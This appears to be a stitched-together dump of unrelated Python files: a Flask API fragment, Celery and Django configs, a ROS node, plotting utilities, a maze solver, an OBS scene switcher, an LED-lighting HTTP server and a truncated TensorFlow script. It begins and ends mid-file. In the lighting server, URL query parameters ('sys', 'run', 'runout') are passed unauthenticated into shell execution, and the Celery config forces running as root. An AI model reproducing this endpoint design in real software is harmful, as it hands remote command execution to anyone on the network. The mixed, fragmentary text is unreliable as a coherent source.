if(len(fight)==0):
abort(404)
else:
return jsonify({'fight':fight[0]})
@app.route('/api/v1.0/getprediction/<title>', methods=['GET'])
def get_fight_by_title(title):
fight = [fight for fight in u if fight['title']==title]
if(len(fight)==0):
abort(404)
else:
return jsonify({'fight':fight[0]})
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'STATUS': 'NOT OK', 'reason':'404'}), 404)
if __name__ == '__main__':
app.run(debug=True)
|
# -*- coding:utf-8 -*-
# @Time: 6/5/20 11:49 AM
# @Author:bayhax
# absolute_import 不会与库冲突,python
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery, platforms
from django.apps import apps
from django.conf import settings
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'UGC.settings')
# redis作队列中间件
# app = Celery('server_manage', backend='redis', broker='redis://localhost')
# rabbitmq作消息队列
# app = Celery('server_manage', broker='amqp://guest:guest@localhost')
app = Celery('UGC')
app.config_from_object(settings)
# app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks(lambda: [n.name for n in apps.get_app_configs()])
# 允许root用户运行celery
platforms.C_FORCE_ROOT = True
# 防止内存泄漏
CELERYD_MAX_TASKS_PER_CHILD = 10
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # dumps its own request information
|
#!/usr/bin/env python
import time
import rospy
print "[Robotics Indoor SDK] initializing ROS node.."
rospy.init_node('positioning', anonymous=True)
print "[Robotics Indoor SDK] ROS node started, initializing positioning system.."
#import lib.x86.robotics_indoor_sdk
import lib.armv7l.robotics_indoor_sdk
while True:
time.sleep(0.2)
|
import matplotlib.pyplot as plt
import numpy as np
x = np.random.randint(100, size=(100))
y = np.random.randint(100, size=(100))
colors = np.random.randint(100, size=(100))
sizes = 10 * np.random.randint(100, size=(100))
plt.scatter(x, y, c=colors, s=sizes, alpha=0.5, cmap='nipy_spectral')
plt.colorbar()
plt.show()
|
import os, sys
from iotbx import pdb
def run(filename, verbose=True):
print "run",filename
pdb_inp = pdb.input(filename)
hierarchy = pdb_inp.construct_hierarchy()
for model in hierarchy.models():
if verbose: print 'model: "%s"' % model.id
for chain in model.chains():
if verbose: print 'chain: "%s"' % chain.id
for residue_group in chain.residue_groups():
if verbose: print ' residue_group: resseq="%s" icode="%s"' % (
residue_group.resseq, residue_group.icode)
for atom_group_i, atom_group in enumerate(residue_group.atom_groups()):
if verbose: print ' atom_group: altloc="%s" resname="%s"' % (
atom_group.altloc, atom_group.resname)
for model in hierarchy.models():
if verbose: print 'model: "%s"' % model.id
for chain in model.chains():
if verbose: print 'chain: "%s"' % chain.id
for conformer in chain.conformers():
print dir(conformer)
if verbose: print ' conformer: altloc="%s"' % (
conformer.altloc)
for residue in conformer.residues():
if verbose: print ' residue: resname="%s"' % (
residue.resname)
for atom_group in hierarchy.atom_groups():
print atom_group.resname
for atom in atom_group.atoms():
print atom.id_str(), atom.quote()
hierarchy.atoms().reset_serial()
if __name__=="__main__":
args = sys.argv[1:]
del sys.argv[1:]
run(*tuple(args))
|
from django.contrib import admin
from .models import Category, Task, Author, Book
from django.utils import timezone
from django.utils.translation import ngettext
from django.contrib import messages
# Register your models here.
@admin.action(description="in this action we want update due_at field")
def update_due_at(modeladmin, request, queryset):
queryset.update(due_at=timezone.now())
# ##### method 2 ######
@admin.register(Task)
class TaskAdmin(admin.ModelAdmin):
readonly_fields = ('id', 'created_at')
list_editable = ('name', 'due_at', )
list_display_links = None
fieldsets = (
('identification', {'fields': ('id', 'name')}),
('time_section', {'fields': ('created_at', 'due_at')}),
('category_section', {'fields': ('cat',)})
)
# fields = (('id', 'created_at'), 'description')
# exclude = ('description',)
list_display = ('name', 'due_at' )
list_filter = ('cat__name', 'due_at')
date_hierarchy = 'due_at'
actions_on_top = True
actions_selection_counter = True
actions = ['update_due_at']
@admin.action(description="in this action we want update due_at field")
def update_due_at(self, request, queryset):
update_number = queryset.update(due_at=timezone.now())
self.message_user(request=request,
message=ngettext("{} task updated ".format(update_number),
"{} tasks updated ".format(update_number),
update_number),
level=messages.ERROR)
class TaskInline(admin.StackedInline):
fields = ('name', 'due_at')
model = Task
extra = 3
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
#
# def get_form(self, request, obj=None, **kwargs):
# form = super().get_form(request, obj, **kwargs)
# form.base_fields['name'].initial = 'cat_default_name'
# return form
inlines = [TaskInline]
# admin.site.register(Task)
# admin.site.register(Category)
##### method 1 #####
# class TaskAdmin(admin.ModelAdmin):
# pass
# admin.site.register(Task, TaskAdmin)
class BookAdmin(admin.ModelAdmin):
pass
###############################
#
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
filter_vertical = ('authors', )
#
#
#
# @admin.register(Author)
# class AuthorAdmin(admin.ModelAdmin):
# pass |
from os import listdir
from os.path import isfile, join, dirname, realpath
import time
import json
from functools import partial
import logging
import click
from obswebsocket import obsws, requests
import numpy
import cv2
from mss import mss
logging.basicConfig(level=logging.ERROR)
host = "localhost"
port = 4444
VALID_RESOLUTIONS_ERROR_MESSAGE = "The only valid resolutions are currently 1080p, 1440p and 1200p. Your resolution is being detected as {resolution}."
VALID_RESOLUTIONS = [
(1080, 1920),
(1440, 2560),
(1200, 1920)
]
print = partial(print, flush=True)
currently_in_default_scene = False
def execute_tick(screen_capture, monitor_to_capture, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, obs, default_scene_name, target_scene_name, show_debug_window):
global currently_in_default_scene
try:
start_time = time.time()
frame = numpy.array(screen_capture.grab(screen_capture.monitors[monitor_to_capture]))
masked_frame = cv2.bitwise_and(frame, frame, mask=image_mask)
image_is_in_frame, matches = frame_contains_one_or_more_matching_images(masked_frame, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, show_debug_window)
tick_time = None
if image_is_in_frame:
if currently_in_default_scene:
obs.call(requests.SetCurrentScene(target_scene_name))
tick_time = round(time.time() - start_time, 2)
currently_in_default_scene = False
elif not currently_in_default_scene:
assumed_render_delay_sec = 0.1
# Compensates for the render delay, otherwise the scene changes too fast
time.sleep(assumed_render_delay_sec)
obs.call(requests.SetCurrentScene(default_scene_name))
tick_time = round((time.time() - start_time) - assumed_render_delay_sec, 2)
currently_in_default_scene = True
return (tick_time, matches)
except Exception as e:
print(e)
return (None, -1)
def get_valid_camera_indices():
# checks the first 10 indexes.
index = 0
arr = []
max_to_check = 10
while index <= max_to_check:
cap = cv2.VideoCapture(index)
ret, frame = cap.read()
if ret:
arr.append(index)
cap.release()
index += 1
indices_cache = arr
return indices_cache
def get_good_matches(matches, num_good_matches_required, show_debug_window):
good = []
for m,n in matches:
if m.distance < 0.75*n.distance:
good.append([m])
# Performance optimization when not in debug
if len(good) >= num_good_matches_required and not show_debug_window:
return good
return good
def frame_contains_one_or_more_matching_images(frame, mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, show_debug_window):
if frame is not None:
keypoints, keypoint_descriptors = feature_detector.detectAndCompute(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), mask)
for image_descriptor in image_descriptors:
matches = feature_matcher.knnMatch(keypoint_descriptors, image_descriptor, k=2)
# Apply ratio test
good = get_good_matches(matches, num_good_matches_required, show_debug_window)
if show_debug_window:
cv2.drawKeypoints(frame, keypoints, frame)
cv2.imshow("obs-screen-recognition", cv2.resize(frame, (0, 0), fx=0.5, fy=0.5))
cv2.waitKey(1)
print("Num matches: {}".format(len(good)))
if len(good) >= num_good_matches_required:
return (True, len(good))
return (False, len(good))
@click.command()
@click.option('--show-debug-window', is_flag=True)
@click.argument('resource-dir', type=click.Path(exists=True,file_okay=False, dir_okay=True))
@click.option('--password')
def main(resource_dir, password, show_debug_window):
with open(dirname(realpath(__file__)) + "/settings.json") as settings_file:
application_settings = json.load(settings_file)
print("Running with settings:", application_settings)
monitor_to_capture = application_settings["monitor_to_capture"]
default_scene_name = application_settings["default_scene_name"]
target_scene_name = application_settings["target_scene_name"]
num_features_to_detect = application_settings["num_features_to_detect"]
num_good_matches_required = application_settings["num_good_matches_required"]
if password:
obs = obsws(host, port, password)
else:
obs = obsws(host, port)
obs.connect()
scenes = obs.call(requests.GetSceneList())
print("Detected scenes in OBS: " + str(scenes))
if show_debug_window:
cv2.startWindowThread()
cv2.namedWindow("obs-screen-recognition")
with mss() as screen_capture:
initial_frame_resolution = numpy.array(screen_capture.grab(screen_capture.monitors[monitor_to_capture])).shape[0:2]
screen_size = str(initial_frame_resolution[0]) + "p" # E.g. 1440p
print("Detected monitor resolution to be {}".format(screen_size))
if initial_frame_resolution not in VALID_RESOLUTIONS:
print(VALID_RESOLUTIONS_ERROR_MESSAGE.format(resolution = initial_frame_resolution))
exit(1)
image_directory = resource_dir + "/" + screen_size
mask_file = resource_dir + "/mask-" + screen_size + ".png"
image_files_to_search_for = [cv2.cvtColor(cv2.imread(join(image_directory, f)), cv2.COLOR_BGR2GRAY) for f in listdir(image_directory) if isfile(join(image_directory, f))]
image_mask = cv2.imread(mask_file, cv2.IMREAD_GRAYSCALE)
feature_detector = cv2.ORB_create(nfeatures=num_features_to_detect, scoreType=cv2.ORB_FAST_SCORE, nlevels=1, fastThreshold=10)
feature_matcher = cv2.BFMatcher(cv2.NORM_HAMMING)
image_descriptors = [feature_detector.detectAndCompute(image, None)[1] for image in image_files_to_search_for]
while True:
try:
tick_time, num_matches = execute_tick(screen_capture, monitor_to_capture, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, obs, default_scene_name, target_scene_name, show_debug_window)
if tick_time:
print("Tick took {} seconds. Suggested OBS source delay: {}ms. Num good matches: {}".format(tick_time, round(tick_time, 2) * 1000, num_matches))
except Exception as e:
print(e)
if __name__ == "__main__":
main() |
###
### starts at the tree root and explores all of the neighbor nodes. save it the queue
### when it is at the present depth prior to moving on to the nodes at the next depth level.
### Keep running until it run out of the nodes.
### At the end node, it saved in the queue is the path and x_coor made it to keep the record
### as direction by counting of the x,y position.
###
###
import pygame
import queue
def maze1():
maze = []
maze.append(["#","O", "#", "#", "#", "#","#"])
maze.append(["#"," ", " ", " ", "#", " ","#"])
maze.append(["#","#", "#", " ", "#", " ","#"])
maze.append(["#"," ", "#", " ", " ", " ","#"])
maze.append(["#"," ", "#", "#", "#", " ","#"])
maze.append(["#"," ", "#", " ", "#", " ","#"])
maze.append(["#"," ", "#", " ", "#", " ","#"])
maze.append(["#"," ", "#", " ", "#", " ","#"])
maze.append(["#"," ", "#", " ", "#", " ","#"])
maze.append(["#"," ", "#", " ", "#", " ","#"])
maze.append(["#"," ", " ", " ", "#", " ","#"])
maze.append(["#"," ", " ", "#", " ", " ","#"])
maze.append(["#","#", "#", "#", "X", "#","#"])
return maze
def pathfind(maze, moves):
for X, end in enumerate(maze[0]): #find X in maze
if end == "O":
start = X
x_coor = start
y_coor = 0
for move in moves:
if move == "L":
x_coor -= 1
if move == "R":
x_coor += 1
if move == "U":
y_coor -= 1
if move == "D":
y_coor += 1
if maze[y_coor][x_coor] == "X":
print("Path: " + moves)
printMaze(maze, moves)
return True
return False
def valid(maze, moves):
for x, end in enumerate(maze[0]):
if end == "O":
start = x
x_coor = start
y_coor = 0
for move in moves:
if move == "L":
x_coor -= 1
if move == "R":
x_coor += 1
if move == "D":
y_coor += 1
if move == "U":
y_coor -= 1
if not(0 <= x_coor < len(maze[0]) and 0 <= y_coor < len(maze)):
return False
elif (maze[y_coor][x_coor] == "#"):
return False
return True
def printMaze(maze, path=""):
for x, end in enumerate(maze[0]):
if end == "O":
start = x
x_coor = start
y_coor = 0
end = set()
for move in path:
if move == "L":
x_coor -= 1
if move == "R":
x_coor += 1
if move == "U":
y_coor -= 1
if move == "D":
y_coor += 1
end.add((y_coor, x_coor))
for y_coor, row in enumerate(maze):
for x_coor, col in enumerate(row):
if (y_coor, x_coor) in end:
print("O ", end="")
else:
print(col + " ", end="")
print()
return
nums = queue.Queue()
nums.put("")
add = ""
#which maze to find?
maze = maze1()
print()
print()
while not pathfind(maze, add):
#grid = create_grid()
add = nums.get()
#print(add)
for y_coor in ["L", "R", "U", "D"]:
put = add + y_coor
if valid(maze, put):
nums.put(put)
print("Breadth First Path Finding")
print() |
#!/usr/bin/python
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
import urlparse
import serial
import time
import sys
from subprocess import call
import os
import socket
from socket import error as socket_error
import os.path
import datetime
import led_command as lc
import argparse
import app_ui as ui
import struct
import threading
import fcntl
from subprocess import Popen, PIPE
# ---------------------------------------------------------
global httpd, webpage, base_path, last_run, host_name, host_ip, app_description, verbose_mode, debug_mode, macro_count, programs, macro_run_number, retry_wait, ip_address, port
global multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
last_run = ''
last_run_full = ''
#host_name = socket.getfqdn(socket.gethostname())
#host_ip = socket.gethostbyname(socket.gethostname())
app_description = None
verbose_mode = None
debug_mode = None
retry_wait = None
ip_address = None
port = None
def get_ip_address(ifname):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
return ""
client_interface_name = 'apcli0'
def get_client_ip():
return get_ip_address(client_interface_name)
def get_client_hostname():
return socket.gethostname()
host_name = get_client_hostname()
host_ip = get_client_ip()
# ---------------------------------------------------------
def get_options():
global verbose_mode, debug_mode, retry_wait, base_path, webpage, ip_address, port, multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
global multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
parser = argparse.ArgumentParser(description=app_description)
parser.add_argument("webpage", metavar="W", nargs="?", help="path to web page")
parser.add_argument("rootpath", metavar="R", nargs="?", help="root path for files")
parser.add_argument("-a", "--addr", dest="address", default="", help='server address (all addresses)')
parser.add_argument("-p", "--port", dest="port", type=int, default=8080, help='server port (8080)')
parser.add_argument("-r", "--retry", dest="retry", type=int, default=10, help='retry wait (secs) (10)')
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="display verbose info (False)")
parser.add_argument("-d", "--debug", dest="debug", action="store_true", help="display debugging info (False)")
parser.add_argument("-m", "--mcaddr", dest="mcaddr", default='224.3.29.71', help='multicast group IP address (224.3.29.71)')
parser.add_argument("-o", "--mcport", dest="mcport", type=int, default=10000, help='multicast port (10000)')
parser.add_argument("-t", "--timeout", dest="timeout", type=float, default=0.1, help='timeout time waiting for responses (seconds) (0.1)')
parser.add_argument("-n", "--numtimes", dest="times", type=int, default=15, help='number of times to issue command (15)')
parser.add_argument("-k", "--nokeys", dest="nokeys", action='store_true', help='disables keys sent for dupe detection (False)')
parser.add_argument("-e", "--delay", dest="delay", type=float, default=0.001, help='delay exponent between duplicate messages (seconds) (0.001)')
args = parser.parse_args()
verbose_mode = args.verbose
debug_mode = args.debug
retry_wait = args.retry
ip_address = args.address
port = args.port
base_path = args.rootpath
if base_path == None:
base_path = os.getcwd() + '/'
webpage = args.webpage
if webpage == None:
webpage = base_path + 'http_command.html'
multicast_group_ip = args.mcaddr
multicast_port = args.mcport
timeout_in_seconds = args.timeout
multicast_group = (multicast_group_ip, multicast_port)
num_times = args.times
no_keys = args.nokeys
msg_delay = args.delay
def validate_options():
errors = False
return not errors
# ---------------------------------------------------------
def initialize():
global app_description
app_description = "Apollo Lighting System - HTTP Commander v.2.0 4-0-2018"
get_options()
if not validate_options():
sys.exit("\nExiting...\n")
lc.begin(verbose_mode)
ui.begin(verbose_mode)
#lc.attention()
#lc.stop_all()
#lc.command("cnt")
def introduction():
ui.app_description(app_description)
ui.info_entry("client ip address", host_ip)
ui.info_entry("server name", host_name)
print
ui.report_verbose("verbose mode")
ui.verbose_entry("root path", base_path)
ui.verbose_entry("web page", webpage)
ui.verbose_entry("server ip_address", "all" if ip_address == '' else ip_address)
ui.verbose_entry("port", str(port))
ui.verbose_entry("multicast group IP", multicast_group_ip)
ui.verbose_entry("multicast port", str(multicast_port))
ui.verbose_entry("reply timeout", str(timeout_in_seconds) + "s")
ui.verbose_entry("sends per message", str(num_times))
ui.verbose_entry("sending keys", str(no_keys == False))
ui.verbose_entry("message delay", str(msg_delay))
ui.verbose_entry("retry wait", str(retry_wait) + "s")
ui.verbose_entry("debug_mode", str(debug_mode))
ui.report_verbose()
# ---------------------------------------------------------
class Handler(BaseHTTPRequestHandler):
global last_run, last_run_full, host_name, host_ip, to_rerun
def run_app(self, app, track=True):
global last_run, last_run_full
if app != 'stop':
run = base_path + app + ' &'
self.log('running: ' + run)
call(run, shell=True)
if track:
last_run_full = app
last_run = app.split()[0]
else:
last_run_full = ''
last_run = ''
else:
last_run_full = ''
last_run = ''
def run_app_capture(self, app):
run = base_path + app
self.log('running with capture: ' + run)
process = Popen(run.split(" "), stdout=PIPE)
(output, err) = process.communicate()
exit_code = process.wait()
return output
def kill_last_app(self):
global last_run, last_run_full
if last_run != '':
self.log('killing: ' + last_run)
call('killall -9 ' + last_run, shell=True)
last_run_full = ''
last_run = ''
def log(self, message):
print
print '#' * 80
print '## ' + message
print '#' * 80
print
def banner(self):
if last_run != '':
return """
<div class="well well-sm clearfix">
<div class="col-xs-9"><i class="fa fa-circle-o-notch fa-spin fa-fw"></i> %(last_run)s</div>
<div class="col-xs-3"><a class="btn btn-link btn-xs pull-right" role="button" href="/command?run=stop"><span class="glyphicon glyphicon-remove-sign"></span></a></div>
</div>
""" % globals()
return ''
def footer(self):
return """
<div class="small text-center">
%(host_name)s %(host_ip)s
</div>
<div class="small text-center">
%(last_run_full)s
</div>
""" % globals()
def content_type(self, file_path):
filename, file_ext = os.path.splitext(file_path)
content_type = "application/octet-stream"
if file_ext == '.html':
content_type = "text/html"
elif file_ext == '.txt':
content_type = "text/plain"
elif file_ext == '.css':
content_type = "text/css"
elif file_ext == '.js':
content_type = "application/javascript"
elif file_ext == '.ico':
content_type = "image/x-icon"
elif file_ext == '.png':
content_type = "image/png"
return content_type
def is_cached(self, file_path, headers):
filetime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path))
filetime_str = filetime.strftime("%a, %d %b %Y %H:%M:%S GMT")
is_cached = False
if headers != None:
if 'If-Modified-Since' in headers:
modified_since = headers['If-Modified-Since']
if modified_since != None:
if modified_since.lower() == filetime_str.lower():
is_cached = True
return is_cached
def serve_text(self, text):
content_type = self.content_type("*.txt")
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Content-Length", len(text))
self.send_header("Cache-Control", "no-cache")
self.end_headers()
self.wfile.write(text)
self.wfile.close()
def serve_page(self, page, headers={}):
global last_run, last_run_full, host_name, host_ip
filetime = datetime.datetime.fromtimestamp(os.path.getmtime(page))
filetime_str = filetime.strftime("%a, %d %b %Y %H:%M:%S GMT")
is_cached = self.is_cached(page, headers)
if is_cached:
self.send_response(304)
self.send_header("Content-Length", "0")
self.end_headers()
return
content_type = self.content_type(page)
self.send_response(200)
self.send_header("Content-type", content_type)
# can't cache the html page until actions are backgrounded
if content_type == "text/html":
self.send_header("Cache-Control", "no-cache")
else:
self.send_header("Cache-Control", "private")
self.send_header("Last-Modified", filetime_str)
self.end_headers()
banner = self.banner()
footer = self.footer()
f = open(page, 'r')
if content_type == "text/html":
self.wfile.write(f.read().replace('<!-- banner -->', banner).replace('<!-- footer -->', footer))
else:
self.wfile.write(f.read())
f.close
self.wfile.close()
def handle_commands(self, commands):
lc.command(":::")
for cmd in commands:
lc.command(cmd)
def stop_running_app(self):
global to_rerun
if last_run != '':
to_rerun = last_run_full
self.kill_last_app();
else:
to_rerun = ''
def restart_running_app(self):
if to_rerun != '':
self.run_app(to_rerun)
def do_cmd(self, args):
self.stop_running_app()
self.handle_commands(["3:pau"] + args['cmd'] + [":3:cnt"])
self.restart_running_app()
def do_color(self, args):
self.stop_running_app()
self.handle_commands(["2:pau"] + args['color'] + [":1:cnt:flu"])
self.restart_running_app()
def do_macro(self, args):
self.stop_running_app()
self.handle_commands(["1:pau:2:cnt"] + [str(args['macro'][0]) + ":run"])
self.restart_running_app()
def do_run(self, args):
self.kill_last_app()
self.run_app(args['run'][0])
def do_runonce(self, args):
self.run_app(args['runonce'][0], False)
def do_runout(self, args):
result = self.run_app_capture(args['runout'][0])
self.serve_text(result)
def do_sys(self, args):
for sys in args['sys']:
self.log('shell command: ' + sys)
call(sys, shell=True)
def do_cast(self, args):
for cast in args['cast']:
send_background_message(cast)
def get_headers(self):
return {'If-Modified-Since': self.headers.getheader('If-Modified-Since')}
def do_webpage(self):
headers = self.get_headers()
# serve main page
# self.serve_page(webpage, headers)
# until command actions are handled asynchronously, need to
# serve the page each time non-cached
self.serve_page(webpage)
def do_textpage(self, text):
self.serve_text(test)
def do_file(self, url):
headers = self.get_headers()
if os.path.isfile(base_path + url.path):
page = base_path + url.path
self.serve_page(page, headers)
return True
else:
return False
def do_notfound(self):
msg = "<html><body><h1>404 Not Found</h1></body></html>"
self.send_response(404)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", len(msg))
self.end_headers()
self.wfile.write(msg)
self.wfile.close()
def do_command(self, url):
args = urlparse.parse_qs(url.query)
if 'cmd' in args:
self.do_cmd(args)
if 'color' in args:
self.do_color(args)
if 'macro' in args:
self.do_macro(args)
if 'run' in args:
self.do_run(args)
if 'runonce' in args:
self.do_runonce(args)
if 'runout' in args:
self.do_runout(args)
return
if 'sys' in args:
self.do_sys(args)
if 'cast' in args:
self.do_cast(args)
self.do_webpage()
def do_GET(self):
url = urlparse.urlparse(self.path)
if url.path == '/command':
self.do_command(url)
else:
if not self.do_file(url):
self.do_notfound()
# ---------------------------------------------------------
def cast_socket():
# Create the datagram socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set a timeout so the socket does not block indefinitely when trying
# to receive data.
sock.settimeout(timeout_in_seconds)
# Set the time-to-live for messages to 1 so they do not go past the
# local network segment.
ttl = struct.pack('b', 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
return sock
def add_key(command):
return host_name + "/" + str(time.time()) + ";" + command
def send_socket_message(sock, message, times):
if no_keys != True:
message = add_key(message)
for n in range(0, times):
# Send data to the multicast group
ui.report_verbose('sending "%s"' % message)
sent = sock.sendto(message, multicast_group)
if verbose_mode:
while True:
try:
data, server = sock.recvfrom(256)
#except KeyboardInterrupt:
# break
except socket.timeout:
break
else:
ui.report_verbose('received "%s" from %s' % (data, server))
if n < (times - 1):
time.sleep(msg_delay * (2 ** n))
def send_message(message):
sock = cast_socket()
send_socket_message(sock, message, num_times)
sock.close()
background_threads = []
def handle_background_message(message):
send_message(message)
thread = threading.current_thread()
background_threads.remove(thread)
ui.report_verbose("terminating thread: " + str(thread))
def send_background_message(message):
thread = threading.Thread(target=handle_background_message, args=(message,))
ui.report_verbose("new thread: " + str(thread))
background_threads.append(thread)
thread.start()
def wait_for_active_threads():
if(len(background_threads) > 0):
ui.report_warn("waiting for active threads to terminate...")
for t in background_threads:
t.join()
############################################################################
def start_server():
global httpd
while(True):
try:
httpd = SocketServer.TCPServer((ip_address, port), Handler)
except socket_error,e:
ui.report_error("Error: " + str(e) + " - retrying")
time.sleep(retry_wait)
continue
ui.report_info("Listening...")
break
def run_server():
try:
httpd.serve_forever()
except KeyboardInterrupt:
ui.report_verbose("keyboard interupt")
httpd.server_close()
#sys.exit("\nExiting...\n")
raise
def setup():
initialize()
introduction()
def run():
start_server()
run_server()
def conclude():
if last_run != '':
ui.report_info('killing: ' + last_run)
call('killall ' + last_run, shell=True)
############################################################################
############################################################################
if __name__ == '__main__':
setup()
try:
run()
except KeyboardInterrupt:
pass
sys.exit("\nExiting...\n")
finally:
wait_for_active_threads()
conclude()
sys.exit("\nExiting...\n")
|
import itertools
from logging import *
import sys
import numpy as np
import matplotlib.pyplot as plt
basicConfig(stream=sys.stderr, level=DEBUG)
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# print("Normalized confusion matrix")
else:
# print('Confusion matrix, without normalization')
pass
# print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
def plot_precision_recall_f1(metrics, metric_labels,
title='Metrics for: ',
cmap=plt.cm.Blues):
metrics = np.array(metrics[:-1]).reshape(-1, 1).T
plt.imshow(metrics, interpolation='nearest', cmap=cmap, aspect='auto')
plt.title(title)
tick_marks = np.arange(len(metric_labels))
plt.xticks(tick_marks, metric_labels, rotation=45)
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False,
right=False,
left=False,
labelleft=False)
fmt = '.2f'
thresh = np.average(metrics)
for i, j in itertools.product(range(metrics.shape[0]), range(metrics.shape[1])):
plt.text(j, i, format(metrics[i, j], fmt),
horizontalalignment="center",
color="white" if metrics[i, j] > thresh else "black")
plt.tight_layout()
def plot_k_folds(k_folds: int, best_param_per_iter: np.array, extra_params: tuple,
labels=['K', 'RMSE for Test', 'RMSE for Train', 'Cost', 'Params'], cmap=plt.cm.Blues):
metrics_list = []
for i in range(len(best_param_per_iter)):
extra_param = tuple([p[i][-1] for p in extra_params])
metrics_list.append(np.array([i % k_folds, *extra_param, 0]))
metrics = np.array(metrics_list)
metric_labels = labels
title = get_formatted_params(best_param_per_iter[0], 'Params are shortened to \n')
height = int(2 * len(best_param_per_iter) * (len(title) * .0003 + 1))
# print(height)
debug(f'height for k fold figure is {height}')
plt.figure(figsize=(8, height))
plt.imshow(metrics, interpolation='nearest', cmap=cmap, aspect='auto')
plt.title(title)
tick_marks = np.arange(len(metric_labels))
plt.xticks(tick_marks, metric_labels, rotation=45)
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False,
right=False,
left=False,
labelleft=False)
fmt = '.2f'
thresh = np.average(metrics)
for i, j in itertools.product(range(metrics.shape[0]), range(metrics.shape[1])):
if j != metrics.shape[1] - 1:
plt.text(j, i, format(metrics[i, j], fmt),
horizontalalignment="center",
color="white" if metrics[i, j] > thresh else "black")
else:
s = ['' + str(get_shortened_key(param)) + ':' + str(best_param_per_iter[i][param]) for param in
best_param_per_iter[i]]
plt.text(j, i, ',\n'.join(s),
horizontalalignment="center",
verticalalignment='center',
color="black")
plt.tight_layout()
def get_formatted_params(parms: dict, prefix='', include_values=False):
s = prefix
for key in parms:
if include_values:
s += get_shortened_key(key) + ':' + str(parms[key]) + '\n'
else:
s += key + ' : ' + get_shortened_key(key) + '\n'
return s
def get_shortened_key(k: str):
""" Gets the first letter of each word, and returns the acronym """
return ''.join([m[0].upper() for m in k.split('_')])
|
# -*- coding: utf-8 -*-
#@Author : lynch
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.layers import Input, Dense,Dropout,LSTM,Bidirectional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
from sklearn import metrics
import tensorflow.keras.backend as K
#在自己的库函数
import dataing ##读取数据
import data_same_length ##处理成定长数据
import loss_function
def binary_focal_loss(gamma=2, alpha=0.25):
"""
Binary form of focal loss.
适用于二分类问题的focal loss
focal_loss(p_t) = -alpha_t * (1 - p_t)**gamma * log(p_t)
where p = sigmoid(x), p_t = p or 1 - p depending on if the label is 1 or 0, respectively.
References:
https://arxiv.org/pdf/1708.02002.pdf
Usage:
model.compile(loss=[binary_focal_loss(alpha=.25, gamma=2)], metrics=["accuracy"], optimizer=adam)
"""
alpha = tf.constant(alpha, dtype=tf.float32)
gamma = tf.constant(gamma, dtype=tf.float32)
def binary_focal_loss_fixed(y_true, y_pred):
"""
y_true shape need be (None,1)
y_pred need be compute after sigmoid
"""
y_true = tf.cast(y_true, tf.float32)
alpha_t = y_true * alpha + (K.ones_like(y_true) - y_true) * (1 - alpha)
p_t = y_true * y_pred + (K.ones_like(y_true) - y_true) * (K.ones_like(y_true) - y_pred) + K.epsilon()
focal_loss = - alpha_t * K.pow((K.ones_like(y_true) - p_t), gamma) * K.log(p_t)
return K.mean(focal_loss)
return binary_focal_loss_fixed
############################################
'''#数据读取
x,y = dataing.data_make()##不定长特征
#x,y = dataing.data_make_samelen()##定长特征
#数据预处理
x_set = np.array(x,dtype=object)
train_set = []
for i in range(len(x)):
train_set.append([x[i],y[i]])
random.shuffle(train_set)###数据重排
x_set1 = [e[0] for e in train_set]#特征数据
y_set1 = [f[1] for f in train_set]#标签
##训练数据最大长度,可以在dataing程序中查看,目前是268
max_length = 268
##keras.preprocessing.sequence.pad_sequences将多个序列截断或补齐为相同长度,返回numpy数组
x_set2 = keras.preprocessing.sequence.pad_sequences(x_set1, maxlen=max_length, dtype='float64',padding='post',value = [0.0,0.0])
y_set2 = np.array(y_set1)
#print(x_set2.shape)
##测试集训练集划分
x_train = x_set2[0:450]
y_train = y_set2[0:450,0]
print(y_train.shape)
print(x_train.shape)
x_test = x_set2[450:517]
